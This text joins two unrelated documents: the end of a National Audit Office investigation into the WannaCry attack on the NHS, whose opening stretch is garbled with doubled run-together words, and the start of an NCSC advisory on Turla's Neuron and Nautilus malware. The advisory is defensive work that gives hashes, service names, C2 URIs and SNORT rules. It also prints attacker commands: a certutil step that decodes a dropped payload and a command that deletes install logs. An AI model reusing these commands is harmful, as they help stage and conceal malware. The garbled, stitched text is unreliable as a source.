forgeneral
generalpractioners
practioners
National
NationalData
DataGuardian
Guardian
Provides
Providesindependent
independentadvice
advice
ondata-sharing
data-sharingand
andsecurity
security
Must
Mustbe
beinformed
informedabout
aboutall
cyber-security
cyber-securityincidents
incidentsat
atthe
same
sametime
timeas
asministers
ministers
Communicates
Communicatesits
itsrole
roleininmanaging
managing
cyber-security
cyber-securityand
andincidents
incidentsto
toother
other
healthcare
healthcareorganisations
organisations
Maintains
Maintainskey
keyIT
ITsystems
systemsused
usedby
byhealthcare
healthcare
organisations,
organisations,such
suchas
asN3
N3and
andSPINE
SPINE
Responsible
Responsiblefor
forensuring
ensuringCCGs
CCGsand
andproviders
providers(eg
(egtrusts)
trusts)have
have
appropriate
appropriateplans
plansininplace
placeto
torespond
respondto
toan
anincident
incidentor
oremergency
emergency
Provides
Providesadvice
adviceto
tothe
thehealth
healthand
andsocial
social
care
caresystem
systemabout
abouthow
howto
toprotect
protectagainst,
against,
orrespond
respondto,
to,aacyber
cyberincident
incident
Lead
Leadorganisation
organisationwhen
whenmajor
majorincident
incidentcalled.
called.Coordinates
Coordinatesthe
control
controlof
ofan
anincident
incidentthrough
throughits
itsEmergency
EmergencyPreparedness,
Preparedness,
Resilience
Resilienceand
andResponse
Response(EPRR)
(EPRR)structures
structureswhere
whereappropriate
appropriate
Provides
Providesadvice
adviceand
andsupport
supportto
tohealth
health
organisations
organisationsduring
duringaacyber
cyberincident,
incident,
through
through
CareCERT
CareCERTReact
React
Communicates
Communicatesto
tothe
thehealthcare
healthcaresystem
systemabout
aboutthe
thepractical
practicaland
clinical
clinicalsteps
stepsto
tobe
betaken
takenininresponse
responseto
toan
anincident
incidentwhen
whenrequired
required
Works
Worksto
tounderstand
understandand
andrespond
respondto
cyber
cyberincidents
incidentson
onnational
nationalsystems
systemsor
onhealthcare
healthcareIT
ITnetworks
networks
Does
Doesthis
thisthrough
throughdigital
digitalteams
teamsat
atregional
regionallevel.
level.These
Theseteams
teams
coordinate
coordinatewith
withNHS
NHSEngland
England
scentral
centralcyber
cyberteam
teamand
andwith
with
NHSDigital
Digital
Notifies
Notifiesand
andworks
workswith
withthe
theNational
NationalCyber
Cyber
Security
SecurityCentre
Centreto
torespond
respondto
tocyber
cyberincidents
incidents
209 clinical
clinical commissioning
commissioning groups
groups
Responsible
Responsible for
for following
following standards
standards set
set by
by the
the Department
Department and
and its
its arm
s-length
s-length bodies,
bodies, for
for protecting
protecting the
the data
data they
they hold
hold according
according to
to the
the Data
Data
Protection
Protection Act
Act 1998,
1998, and
and for
for having
having arrangements
arrangements inin place
place to
to respond
respond to
to an
an incident
incident or
or emergency,
emergency, under
under the
the Civil
Civil Contingencies
Contingencies Act
Act 2004
2004
Other
Other government
government
Health
Health sector
sector
Source:
Source:National
NationalAudit
AuditOffi
Office
ceanalysis
analysisof
ofDepartment
Departmentof
ofHealth
Healthand
andNHS
NHSEngland
Englanddata
data
Investigation: WannaCry cyber attack and the NHS Part Three 23
NHSImprovement
Improvement
Care
CareQuality
QualityCommission
Commission
Communicates
Communicatesinformation
informationabout
aboutcyber-security
cyber-securityto
totrusts
trusts
andother
otherhealthcare
healthcareproviders
providers
Assesses
Assessesand
andregulates
regulatesthe
thesafety
safety
ofpatient
patientcare
care
Works
Workswith
withtrusts
trustsat
ataaleadership
leadershiplevel
levelto
tosupport
supportboard
board
ownership
ownershipof
ofcyber-security
cyber-securityand
andoverall
overallresponse
responseto
cyber
cyberincidents
incidents
Assesses
Assessesthe
theadequacy
adequacyof
ofleadership
leadership
including
includingininensuring
ensuringdata
datasecurity
security
Works
Workswith
withsenior
seniorhealthcare
healthcareleaders
leadersto
toensure
ensurerecommended
recommended
actions
actionsfor
forcyber
cyberresilience
resilienceare
areimplemented,
implemented,and
andacts
actsas
asan
escalation
escalationpoint
pointwhen
whencyber
cyberincidents
incidentsoccur
occur
Takes
Takesaccount
accountof
ofdata
datasecurity
securityininreaching
reaching
judgements
judgementson
onwell-led
well-ledorganisations
organisations
Attains
Attainsassurance
assurancethat
thatfollow-up
follow-upactions
actionsto
toincrease
increaseresilience
resilience
have
havebeen
beenimplemented
implementedby
byhealthcare
healthcareproviders
providers
Considers
Considersdata
datasecurity
securityduring
duringits
itsoversight
oversightof
oftrusts
trusts
through
throughthe
theSingle
SingleOversight
OversightFramework
Frameworkand
andas
aspart
partof
ofits
decision-making
decision-makingon
ontrusts
trustswho
whoare
areininspecial
specialmeasures
measures
Works
Workswith
withNHS
NHSEngland
Englandto
tocommunicate
communicateto
tothe
thehealthcare
healthcare
system
systemduring
duringaacyber
cyberincident,
incident,ininparticular
particularthrough
throughthe
chief
chiefinformation
informationofficer
officer(CIO)
(CIO)for
forthe
thehealth
healthand
andcare
caresystem
system
(who
(whoworks
worksacross
acrossNHS
NHSImprovement
Improvementand
andNHS
NHSEngland)
England)
236NHS
NHStrusts
trustsand
andNHS
NHSfoundation
foundationtrusts
trusts
Responsible
Responsiblefor
forfollowing
followingstandards
standardsset
setby
bythe
theDepartment
Departmentand
andits
itsarm
s-length
s-lengthbodies
bodiesfor
forprotecting
protectingthe
thedata
datathey
they
hold
holdaccording
accordingto
tothe
theData
DataProtection
ProtectionAct
Act1998,
1998,and
andfor
forhaving
havingarrangements
arrangementsininplace
placeto
torespond
respondto
toan
anincident
incidentor
emergency,
emergency,under
underthe
theCivil
CivilContingencies
ContingenciesAct
Act2004
2004
24 Part Three Investigation: WannaCry cyber attack and the NHS
How the cyber attack was managed
3.3 Before the WannaCry attack the Department had developed a plan for responding
to a cyber attack, which included roles and responsibilities of national and local
organisations. However, the Department had not tested the plan at a local level. This
meant the NHS was not clear what actions it should take when affected by WannaCry,
including how it should respond at a local level. On 12 May 2017, NHS England
determined that it should declare a national major incident and decided that it would
lead the response, coordinating with NHS Digital and NHS Improvement. NHS England
treated the attack as a major operational incident through its existing Emergency
Preparedness, Resilience and Response (EPRR) processes. However, as NHS England
had not rehearsed its response to a cyber attack it faced a number of challenges. The
cyber attack was less visible than other types of incident and not confined to local areas
or regions in the way a major transport accident would have been, for example. This
meant that it took more time to determine the cause of the problem, the scale of the
problem and the number of people and organisations affected.
3.4 Without clear guidelines on responding to a national cyber attack, organisations
reported the attack to different sources including the local police, NHS England and
NHS Digital. For the same reason communications to patients and local organisations
also came from a number of sources. These included the National Cyber Security
Centre, which was providing support to all UK organisations affected by the attack,
NHS England and NHS Digital. In addition, the use of email for communication was
limited, although NHS Improvement did communicate with trusts
chief executive officers
by telephone. Affected trusts shut down IT systems, including some trusts disconnecting
from NHS email and the N3 network as a precautionary measure.5 The Department
coordinated the response with the centre of government, briefing ministers, liaising
with the National Cyber Security Centre and National Crime Agency, and overseeing
NHS England
s and NHS Digital
s operational response.
3.5 Affected trusts were triaged through the EPRR route and, where necessary,
received assistance from national bodies, including advice and physical technical
support from NHS Digital, which sent 54 staff out to hospitals to provide direct support.
Staff at the Department, NHS England, NHS Improvement and NHS Digital, as well
as large numbers of staff in other organisations across the NHS, worked through the
weekend to resolve the problem and avoid further problems on Monday. NHS England
IT team did not have on-call arrangements in place, but staff came in voluntarily to help
resolve the issue. Front-line NHS staff adapted to communication challenges and shared
information through personal mobile devices, including using the encrypted WhatsApp
application. NHS national bodies and trusts told us that this worked well on the day
although is not an official communication channel.
N3 is the broadband network connecting all NHS sites in England.
Investigation: WannaCry cyber attack and the NHS Part Three 25
The risk of a cyber attack had been identified before WannaCry
3.6 The Secretary of State for Health asked the National Data Guardian and CQC
to undertake reviews of data security. These reports were published in July 2016 and
warned the Department about the cyber threat and the need for the Department to
respond to it. They noted the threat of cyber attacks not only put patient information
at risk of loss or compromise but also jeopardised access to critical patient record
systems by clinicians. They recommended that all health and care organisations needed
to provide evidence that they were taking action to improve cyber-security, such as
through the
Cyber Essentials
scheme.6
3.7 Although WannaCry was the largest cyber-security incident to affect the
NHS, individual NHS organisations had been victims of other attacks in recent
years (Figure 5 overleaf). WannaCry infected one of England
s biggest trusts, Barts
Health NHS Trust. This was the second cyber attack to affect the trust in six months.
A ransomware attack had also affected Northern Lincolnshire and Goole NHS Foundation
Trust in October 2016, which had led to it cancelling 2,800 appointments.
Lessons learned
3.8 The NHS has accepted that there are lessons to learn from WannaCry and is
already taking action. The NHS has identified the need to improve the protection of
services from future cyber attacks. These include the need to:
develop a response plan setting out what the NHS should do in the event of a
cyber attack and establish the roles and responsibilities of local and national
NHS bodies and the Department;
ensure organisations implement critical CareCERT alerts, including applying
software patches and keeping anti-virus software up to date and identifying;
ensure essential communications are getting through during an incident
when systems are down; and
ensure that organisations, boards and their staff are taking the cyber threat
seriously, understand the direct risks to front-line services and are working
proactively to maximise their resilience and minimise the impact on patient care.
3.9 Following the WannaCry attack, NHS England and NHS Improvement wrote to
every trust, clinical commissioning group and commissioning support unit asking boards
to ensure that they had implemented all 39 CareCERT alerts issued by NHS Digital
between March and May 2017 and had taken essential action to secure local firewalls.
Cyber Essentials is a government-designed cyber-security certification scheme that sets out a baseline of
cyber
security and can be used by any organisation in any sector, see: www.cyberaware.gov.uk/cyberessentials/
Source: National Audit Office
Lasted four days and affected more than 2,800 patients
Trust resolved the issue, liaising with external
cyber-security company and police
Cancelled appointments, operations and diagnostic
procedures. High-risk women in labour had to be
transferred to other hospitals
Princess of Wales Hospital, Scunthorpe General
Hospital and Goole and District Hospital affected as
well as United Lincolnshire Hospital NHS Trust due to
shared IT access
2016
2016
Royal Cornwall Hospitals NHS Trust had been
infected by a cyber attack once before 2016, and was
the subject of multiple, unsuccessful attacks during 2016
At least 2000 current and former staff
thought to have had details compromised
Shut down file-sharing system to investigate the attack
Initially reported to be ransomware but later concluded by the
trust to be Trojan malware, which was successfully contained
Landauer was employed by the NHS to
monitor radiation levels among staff
2017
12 May 2017
Global WannaCry
attack affects the NHS
28 February 2017
Private files
stolen from Landauer, which has
personal details of NHS staff
7 February 2017 ISIS-linked
hackers display graphic
images on NHS websites
The Royal London, St Bartholomew
s, Whipps Cross and
Newham hospitals were affected.
30 October 2016
Variant of Globe2 ransomware
attack on the Northern Lincolnshire and Goole
NHS Foundation Trust
13 January 2017
Barts Health
NHS Trust, one of the largest trusts
in the NHS, suffers cyber attack
The NHS had experienced a number of cyber attacks prior to the WannaCry attack
Figure 5
Cyber attacks on the NHS in 2016 and 2017 before 12 May 2017
Figure 5 shows that the NHS had experienced a number cyber attacks prior to the WannaCry attack
26 Part Three Investigation: WannaCry cyber attack and the NHS
Investigation: WannaCry cyber attack and the NHS Part Three 27
3.10 NHS England and NHS Improvement are talking to every major trauma centre
and ambulance trust, and will reprioritise
21 million in capital funding from existing
IT budgets to improve cyber-security in major trauma centres. NHS Digital has built a
new CareCERT Collect portal to provide assurance that trusts have implemented cyber
alerts and to collect central data on IT and digital assets in the NHS. Since 2015, the
Department has made
50 million available to provide central support to the health and
care system through the CareCERT suite of services.
3.11 Following the WannaCry attack, in July 2017 the Department published its
response to the National Data Guardian and CQC recommendations. The response built
on existing work to strengthen cyber-security in the NHS, involving the Department and
its arm
s-length bodies. For example, NHS Digital was developing its existing services to
support local organisations, including broadcasting alerts about cyber threats, providing
a hotline for dealing with incidents, sharing best practice across the health system and
carrying out on-site assessments to help protect against future cyber attacks; and
NHS England had embedded the 10 Data Security Standards, recommended by the
National Data Guardian, in the standard NHS contract for 2017-18, and was providing
training to its Board and local teams to raise awareness of cyber threats. The Department
also told us that a revised version of the Information Governance Toolkit is being developed
for use in 2018-19, and that the inspection framework used by the CQC will be updated to
incorporate the data standards.7
The Information Governance Toolkit draws together the legal rules and central guidance issued by the Department
of Health, and presents them in a single standard as a set of information governance requirements. All health and
social care providers, commissioners and suppliers are required to carry out self-assessments of their compliance
against these requirements. The Toolkit is commissioned by the Department and is maintained by NHS Digital.
See www.igt.hscic.gov.uk/
28 Appendix One Investigation: WannaCry cyber attack and the NHS
Appendix One
Our investigative approach
Scope
We conducted an investigation into the WannaCry cyber attack that affected
the NHS in England on 12 May 2017. We investigated:
the WannaCry attack
s impact on the NHS and its patients;
why some parts of the NHS were affected; and
how the Department, NHS national bodies (NHS England, NHS Digital and
NHS Improvement) and other national bodies, such as the National Cyber
Security Centre and National Crime Agency, responded to the incident.
Methods
In examining the issues in paragraph one, we drew on a variety of evidence sources.
We conducted semi-structured interviews with officials from:
Department of Health
NHS England
NHS Digital
NHS Improvement
Care Quality Commission
National Cyber Security Centre
National Crime Agency
Cabinet Office.
Investigation: WannaCry cyber attack and the NHS Appendix One 29
We visited four local trusts to examine their roles and responsibilities in relation to
cyber-security; the impact of WannaCry on the trust and its patients; and how the trust
responded to the incident:
Barts Health NHS Trust;
Bedford Hospital NHS Trust;
Northern Lincolnshire and Goole NHS Foundation Trust; and
the Royal Marsden NHS Foundation Trust.
We reviewed documents relating to the WannaCry ransomware attack including
documents setting out roles and responsibilities for cyber-security in the NHS and
across the wider public sector. We also reviewed published and unpublished research
and reports relating to the NHS and WannaCry and cyber-security more generally.
We carried out analysis of data provided by NHS England, NHS Digital and the
Care Quality Commission.
30 Appendix Two Investigation: WannaCry cyber attack and the NHS
Appendix Two
Trusts infected or disrupted by WannaCry
Figure 6
Trusts infected, or affected, by the WannaCry attack
Trusts infected by WannaCry, and locked out of devices
Barts Health NHS Trust
Lancashire Care NHS Foundation Trust
Birmingham Community Healthcare
NHS Foundation Trust
Lancashire Teaching Hospital NHS Trust
Blackpool Teaching Hospitals
NHS Foundation Trust
Bradford District Care NHS Foundation Trust
Bridgewater Community Healthcare
NHS Foundation Trust
Central Manchester University Hospitals
NHS Foundation Trust
Colchester Hospital University
NHS Foundation Trust
Mid Essex Hospital Services NHS Trust
Norfolk and Norwich University Hospital
NHS Foundation Trust
North Cumbria University Hospitals NHS Trust
Northern Lincolnshire and Goole
NHS Foundation Trust
Northumbria Healthcare NHS Foundation Trust
Nottinghamshire Healthcare NHS Foundation Trust
Plymouth Hospitals NHS Trust
Cumbria Partnership NHS Foundation Trust
Royal Berkshire Hospital NHS Foundation Trust
East and North Hertfordshire NHS Trust
Salford Royal NHS Foundation Trust
East Cheshire NHS Trust
Shrewsbury and Telford Hospital NHS Trust
East Lancashire Teaching Hospitals NHS Trust
Solent NHS Trust
Essex Partnership University NHS Foundation Trust
Southport and Ormskirk Hospital NHS Trust
George Eliot Hospital NHS Trust
The Dudley Group NHS Foundation Trust
Greater Manchester Mental Health
NHS Foundation Trust
United Lincolnshire Hospitals NHS Trust
Hampshire Hospitals NHS Foundation Trust
Hull and East Yorkshire Hospitals NHS Trust
Humber NHS Foundation Trust
James Paget University Hospitals
NHS Foundation Trust
Source: NHS England
Figure 6 shows Trusts infected, or affected, by the WannaCry attack
University Hospitals of Morecambe Bay
NHS Foundation Trust
Wrightington, Wigan and Leigh
NHS Foundation Trust
York Teaching Hospitals NHS Foundation Trust
Investigation: WannaCry cyber attack and the NHS Appendix Two 31
Trusts not infected by WannaCry but known to have experienced disruption
Airedale NHS Foundation Trust
Leicestershire Partnership NHS Trust
Ashford and St Peters Hospitals
NHS Foundation Trust
Lincolnshire Community Health Services NHS Trust
Barking, Havering and Redbridge University
Hospitals NHS Trust
Barnsley Hospital NHS Foundation Trust
Bedford Hospital NHS Trust
Bradford Teaching Hospitals NHS Foundation Trust
Brighton and Sussex University Hospitals NHS Trust
Buckinghamshire Healthcare NHS Foundation Trust
Calderdale and Huddersfield NHS Foundation Trust
Central London Community Healthcare NHS Trust
Chelsea and Westminster Hospital
NHS Foundation Trust
Doncaster and Bassetlaw Hospitals
NHS Foundation Trust
Dorset Healthcare NHS Foundation Trust
East Kent Hospitals University
NHS Foundation Trust
Great Ormond Street Hospital
NHS Foundation Trust
s and St Thomas
NHS Foundation Trust
Harrogate and District NHS Foundation Trust
Kettering General Hospital NHS Foundation Trust
Kingston Hospital NHS Trust
Leeds and York Partnership NHS Foundation Trust
Leeds Community Healthcare NHS Trust
Leeds Teaching Hospitals NHS Trust
Source: NHS England
Lincolnshire Partnership NHS Trust
London North West Healthcare NHS Trust
Luton and Dunstable NHS Trust
Mid Yorkshire Hospitals NHS Trust
Moorfields Eye Hospital NHS Foundation Trust
North West Ambulance Service NHS Trust
Northampton General Hospital NHS Trust
Northamptonshire Healthcare
NHS Foundation Trust
Rotherham, Doncaster and South Humber
NHS Foundation Trust
Sheffield Children
s NHS Foundation Trust
Sheffield Health and Social Care
NHS Foundation Trust
Sheffield Teaching Hospitals NHS Foundation Trust
South West Yorkshire Partnership
NHS Foundation Trust
South Western Ambulance Service
NHS Foundation Trust
Sussex Community NHS Foundation Trust
The Rotherham NHS Foundation Trust
University Hospitals of Leicester NHS Trust
West Hertfordshire Hospitals NHS Trust
West London Mental Health NHS Trust
Yorkshire Ambulance Service NHS Trust
This report has been printed on Evolution
Digital Satin and contains material sourced
from responsibly managed and sustainable
forests certified in accordance with the FSC
(Forest Stewardship Council).
The wood pulp is totally recyclable and
acid-free. Our printers also have full ISO 14001
environmental accreditation, which ensures
that they have effective procedures in place to
manage waste and practices that may affect
the environment.
10.00
ISBN 978-1-78604-147-0
Design and Production by NAO External Relations
DP Ref: 11594-001
9 781786 041470
TLP WHITE
Turla group using Neuron
and Nautilus tools alongside
Snake malware
Version 2.0
Reference: NCSC-Ops/35-17
23 November 2017
Crown Copyright 2017
TLP WHITE
Page 1 of 27
TLP WHITE
About this document
This report provides new intelligence by the NCSC on two tools used by the Turla
group to target the UK. It contains IOCs and signatures for detection by network
defenders.
Handling of the Report
Information in this report has been given a Traffic Light Protocol (TLP) of WHITE,
which means it can be shared within and beyond the CiSP community with no
handling restrictions.
Disclaimer
This report draws on reported information and NCSC investigations into Turla activity
in the UK.
TLP WHITE
Page 2 of 27
TLP WHITE
Contents
Introduction............................................................................................................................................ 4
Neuron Analysis ................................................................................................................................... 5
Neuron Service ................................................................................................................................. 6
Associated Files ........................................................................................................................... 6
Infection Vector & Install ............................................................................................................. 7
Persistence.................................................................................................................................... 7
Network Communications ........................................................................................................... 8
Capabilities .................................................................................................................................. 10
Neuron Client .................................................................................................................................. 10
Associated Files ......................................................................................................................... 10
Persistence.................................................................................................................................. 11
Configuration ............................................................................................................................... 12
Network Communications ......................................................................................................... 12
Capability ..................................................................................................................................... 13
Associated Files ......................................................................................................................... 15
Configuration ............................................................................................................................... 15
Communications ......................................................................................................................... 17
Capability ..................................................................................................................................... 18
Appendix A .......................................................................................................................................... 20
Neuron Client .................................................................................................................................. 20
Neuron Service ............................................................................................................................... 21
Neuron Yara .................................................................................................................................... 22
Nautilus ................................................................................................................................................ 25
Nautilus Yara................................................................................................................................... 25
Additional Indicators for Forensic Analysis .................................................................................... 27
TLP WHITE
Page 3 of 27
TLP WHITE
Introduction
Neuron and Nautilus are malicious tools designed to operate on Microsoft Windows
platforms, primarily targeting mail servers and web servers. The NCSC has observed
these tools being used by the Turla group to maintain persistent network access and
to conduct network operations.
The Turla group use a range of tools and techniques, many of which are custom. Using
their advanced toolkit, the Turla group compromise networks for the purposes of
intelligence collection. The Turla group is known to target government, military,
technology, energy and commercial organisations.
The Turla group has operated on targets using a rootkit known as Snake for many
years. Like Neuron and Nautilus, Snake provides a platform to steal sensitive data,
acts as a gateway for internal network operations and is used to conduct onward
attacks against other organisations.
The Turla group are experienced in maintaining covert access through incident
response activities. They infect multiple systems within target networks and deploy a
diverse range of tools to ensure that they retain a foothold back onto a victim even
after the initial infection vector has been mitigated.
The NCSC has observed both Neuron and Nautilus being used in conjunction with the
Snake rootkit. In a number of instances, one or both of these tools has been deployed
following the successful installation of Snake. The NCSC believes that Neuron and
Nautilus are another component of the wider Turla campaign and are not acting as
replacements for the Snake rootkit. It is likely that these tools have seen wider
deployment since the Snake rootkit has been reported on by the information security
industry, providing the group with additional methods of access.
This advisory provides information to detect Neuron and Nautilus infections. The
NCSC encourages any organisation that has previously experienced a compromise
by the Turla group to be diligent in checking for the presence of these additional tools.
Whilst they are commonly deployed alongside the Snake rootkit, these tools can also
be operated independently.
TLP WHITE
Page 4 of 27
TLP WHITE
Neuron Analysis
Neuron consists of both client and server components. The Neuron client and Neuron
service are written using the .NET framework with some codebase overlaps.
The Neuron client is used to infect victim endpoints and extract sensitive information
from local client machines. The Neuron server is used to infect network infrastructure
such as mail and web servers, and acts as local Command & Control (C2) for the client
component. Establishing a local C2 limits interaction with the target network and
remote hosts. It also reduces the log footprint of actor infrastructure and enables client
interaction to appear more convincing as the traffic is contained within the target
network.
The main method of communication between the Neuron client and service is via
HTTP requests. The Neuron service creates its own HTTP listener and waits for
requests to a configured Neuron URL endpoint. These endpoint names are themed
around legitimate web services, such as Microsoft Exchange and Microsoft IIS, which
further helps malware traffic appear legitimate. Details of these endpoints are provided
in the Neuron service communications section of this advisory.
A subset of Neuron services analysed by the NCSC can receive communications via
pipes alongside the HTTP listener, however this functionality is missing from some
samples.
One of the main pieces of functionality implemented within Neuron is the synchronising
StorageFile
objects and
StorageScript
objects between the client and service.
These are described in more detail in the Network Communications section.
This malware is referred to as
Neuron
due to the presence of a PDB string within the
binary and various other references throughout.
c:\Develop\internal\neuron-client\dropper-svc\obj\Release\dropper-svc.pdb
TLP WHITE
Page 5 of 27
TLP WHITE
Neuron Service
The Neuron service is typically installed on compromised infrastructure such as mail
and web servers, and listens for HTTP requests from infected clients. In this way,
Neuron service acts as a Command & Control (C2) server inside the victim network
for infected Neuron clients. While Neuron service examples observed by the NCSC
have been running on servers, it is also possible for it to be run on Windows clients.
The installation of a C2 server inside the victim network allows the actor to evade
detection by network gateway based monitoring. While external communications are
required for the actor to make connections back to their upstream C2 infrastructure,
these communications are often encrypted using the legitimate TLS configuration of
the victim network.
The Neuron service and client model enables the communications to appear
legitimate, with endpoint victims running the client, and the actor initiating connections
to the (typically) outward-facing Neuron infected server.
Associated Files
Name
Microsoft.Exchange.Service.exe
Description
Neuron Service
0f12268221e27406351a6313f902b498
SHA1
b0dbdc81a0e367330007b7e593d8dabf92ca7afd
SHA256
d1d7a96fcadc137e80ad866c838502713db9cdfe59939342b8e3beacf9c7fe29
Size
43008
Name
w3wpdiag.exe
Description
Neuron Service
371b4380080e3d94ffcae1a7e9a0d5e2
SHA1
f7088075d1c798f27b0d269c97dc877ff16f1401
SHA256
2986bae15cfa78b919d21dc070be944e949a027e8047a812026e35c66ab17353
Size
59392
Name
Updater.exe
Description
Neuron Service
8229622a9790d75e09a099e8758d5703
SHA1
10586913ceeecd408da4e656c29ed4e91c6b758e
SHA256
2f4d6a3c87770c7d42d1a1b71ed021a083b08f69ccaf63c15428c7bc6f69cb10
Size
44544
TLP WHITE
Page 6 of 27
TLP WHITE
Name
w3wpdiag.exe
Description
Neuron Service
a3bdc385cf68019449027bd6d8cecb4d
SHA1
fe8da5a1e62a8d4f627834b0f26c802a330d8d45
SHA256
0f4e9e391696ed8b9172985bb43cca7d7f2c8a4ae0493e4bf1f15b90f7138259
Size
58880
Name
dropper-svc.exe
Description
Dropper for the Neuron service
d6ef3c8f2c3f3ddffbb70f5dadfa982c
SHA1
934b288075c122165897276b360c61e77cb7bde0
SHA256
fa543de359d498150cbcb67c1631e726a4b14b0a859573185cede5b12ad2abfb
Size
85008
Infection Vector & Install
The infection vector for the Neuron service is typically via exploitation of application
layer vulnerabilities in server software, server misconfigurations, or brute-force attacks
on administrative accounts.
Neuron service requires a dropper that essentially performs the same actions as the
client dropper, embedding the final payload using the same method detailed in the
Neuron client section. The service dropper takes a parameter of the path where the
payload will be dropped.
Following execution, the dropper modifies the last access time of the deployed files to
match the timestamps of the legitimate file
EdgeTransport.exe
. It is advised that
forensic investigators conduct a search for files that have this timestamp applied.
Finally, the dropper executes the following command to remove all installation log files:
cmd.exe /c del *.InstallLog *.InstallState
Persistence
In order to persist on the compromised hosts, Neuron service installs itself as an
automatic service, allowing the infection to persist through a server restart. The
Neuron service can be manually stopped and removed, and contains no method of reestablishing execution.
TLP WHITE
Page 7 of 27
TLP WHITE
The Neuron service attempts to masquerade as legitimate Microsoft Exchange or
Microsoft IIS services. A list of the service names and descriptions used within Neuron
samples is as follows:
SERVICE NAME
DISPLAY NAME
DESCRIPTION
MSExchangeService
Microsoft Exchange
Service
Host service for the Microsoft Exchange
Server management provider. If this service
is stopped or disabled, Microsoft Exchange
cannot be managed.
W3WPDIAG
Microsoft IIS
Diagnostics Service
Host service for the Microsoft IIS management
provider. If this service is stopped or
disabled, Microsoft IIS cannot be managed.
Updater
Updater
Host service for software update. If this
service is stopped or disabled, software
cannot be update.
Network Communications
Communications between the client and service are via HTTP requests. The service
will establish a HTTP listener, commonly on port 443 (https), however instances have
been analysed where port 80 (http) is used instead. The listener waits for requests on
the host matching specific URIs defined by the configuration. The following have been
defined in the configuration in Neuron samples analysed by the NCSC:
https://*:443/ews/exchange/
https://*:443/W3SVC/
https://*:80/W3SVC/
Neuron clients send requests to the defined endpoint in order to communicate with the
service. In order to make the traffic from clients look legitimate, the actor has chosen
to name their endpoints with common Microsoft Windows terms.
Communications are encrypted using RC4 as an additional layer of security. The RC4
key is sent to the connecting client using a pre-configured RSA key.
Parameters for a request are sent in the POST body, with the following values
possible:
cadataKey
cadata
cadataSig
TLP WHITE
Page 8 of 27
TLP WHITE
The values for these parameters are base64 encoded and RC4 encrypted using the
key exchanged between the client and service. Each parameter performs a different
task within the service; for example,
requests the current RC4 key and
cadata
sends an instruction to be run.
An example HTTP communication is shown below:
POST https:///ews/exchange/exchange.asmx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host:
Content-Length:
Expect: 100-continue
Connection: Keep-Alive
cadata=
The following SNORT rules can be used to alert on this traffic. Network collection will
need to be in place between the client and server; in most instances, this is between
two machines within the same LAN:
alert tcp $HOME_NET any -> $EXTERNAL_NET any (flow: established,from_client; msg:
"Web/request\:POST - Neuron A"; content: "cadata="; fast_pattern; content: "ContentType|3a| application/x-www-form-urlencoded"; content: "Expect|3a| 100-continue"; pcre:
"/\ncadata=[a-zA-Z0-9%]{1,5000}/"; content: "POST"; http_method; rev: 1; priority: 1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (flow: established,from_client; msg:
"Web/request\:POST - Neuron B"; content: "cadata="; fast_pattern; content: "ContentType|3a| application/x-www-form-urlencoded"; content: "Expect|3a| 100-continue"; pcre:
"/\ncadataKey=[a-zA-Z0-9%]{1,5000}/"; content: "POST"; http_method; rev: 1; priority:
alert tcp $HOME_NET any -> $EXTERNAL_NET any (flow: established,from_client; msg:
"Web/request\:POST - Neuron C"; content: "cadata="; fast_pattern; content: "ContentType|3a| application/x-www-form-urlencoded"; content: "Expect|3a| 100-continue"; pcre:
"/\ncid=[a-zA-Z0-9%]{1,5000}/"; content: "POST"; http_method; rev: 1; priority: 1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (flow: established,from_client; msg:
"Web/request\:POST - Neuron D"; content: "cadata="; fast_pattern; content: "ContentType|3a| application/x-www-form-urlencoded"; content: "Expect|3a| 100-continue"; pcre:
"/\ncadataSig=[a-zA-Z0-9%]{1,5000}/"; content: "POST"; http_method; rev: 1; priority:
In addition to HTTP communications, some observed Neuron service samples have
functionality that enables the clients to communicate with it via pipes, for example:
pipe://*/Winsock2/w3svc
TLP WHITE
Page 9 of 27
TLP WHITE
Capabilities
The main functionality of the Neuron service is to return and synchronise StorageFile
and StorageScript objects between the client and service.
A StorageFile object contains information about a file including its name, modified date
and the file contents; a StorageScript object contains
instructions
. There are multiple
instruction types, including the following:
Executing a command using cmd.exe
Creating new StorageFiles
Downloading specified or all StorageFiles
Neuron Client
The Neuron client component is typically installed on endpoint machines within a
victim network. Command & Control (C2) is conducted by the Neuron service. The
client is designed to collect, package and send documents to the service component
for onward exfiltration.
Associated Files
Name
neuron-client.exe
Description
Neuron Client
4ed42233962a89deaa89fd7b989db081
SHA1
cf731ee0af5c19231ff51af589f7434c0367d508
SHA256
a96c57c35df18ac20d83b08a88e502071bd0033add0914b951adbd1639b0b873
Size
55808
Name
Sign.exe
Description
Dropper for the Neuron client
3cd5fa46507657f723719b7809d2d1f9
SHA1
34ddc14b9a04eba98c3aa1cb27033e12ec847e03
SHA256
a6dbc36c472b3ba70a98efd0db35e75c340086be15d3c3ab4e39033604d0bcf9
Size
115712
Name
mydoc.doc
Description
Macro document that drops and runs Sign.exe (client dropper)
66f4f1384105ce7ee1636d34f2afb1c9
SHA1
3f23d152cc7badf728dfd60f6baa5c861a500630
SHA256
42fbb2437faf68bae5c5877bed4d257e14788ff81f670926e1d4bbe731e7981b
Size
591360
TLP WHITE
Page 10 of 27
TLP WHITE
Name
Description
Macro document that drops and runs Sign.exe (client dropper)
0e430b6b203099f9c305681e1dcff375
SHA1
845f3048fb0cfbdfb35bf6ced47da1d91ff2e2b1
SHA256
bbe3700b5066d524dd961bd47e193ab2c34565577ce91e6d28bdaf609d2d97a8
Size
590336
Infection Vector and Install
The Neuron client infection vector appears to be via spear-phishing victims with
documents containing macros. When a document is opened, and macros are enabled,
a base64 encoded blob is constructed and written to the %temp% directory as
Signature.crt
; this is then decoded using the legitimate Microsoft binary
certutil.exe
for example:
certutil.exe -decode %TEMP%\Signature.crt %TEMP%\Sign.exe
The resulting executable is the Neuron client dropper, which is responsible for setting
up any initial configuration, establishing persistence and dropping the main payload to
disk.
The main payloads are embedded in the dropper executable and are GZIP
compressed and RC4 encrypted with a hardcoded key. The dropper is also
responsible for deploying any legitimate DLLs that may also be required
these are
stored in the same way.
All files are placed into the directory from which the dropper was executed.
Persistence
The Neuron client executable contains no functionality to establish persistence.
Instead, the dropper handles this for the client by creating a scheduled task, enabling
it to persist after a reboot.
The task is scheduled to run every 12 minutes (PT12M), with a task ID of
Microsoft
Corporation
and a task description constructed from a string retrieved from a
randomly selected registry value. To build the task description, a list of value names
of length 9 or greater but not containing "\" are retrieved from
HKLM\\Software\\Microsoft registry. One of these values is selected and prefixed to
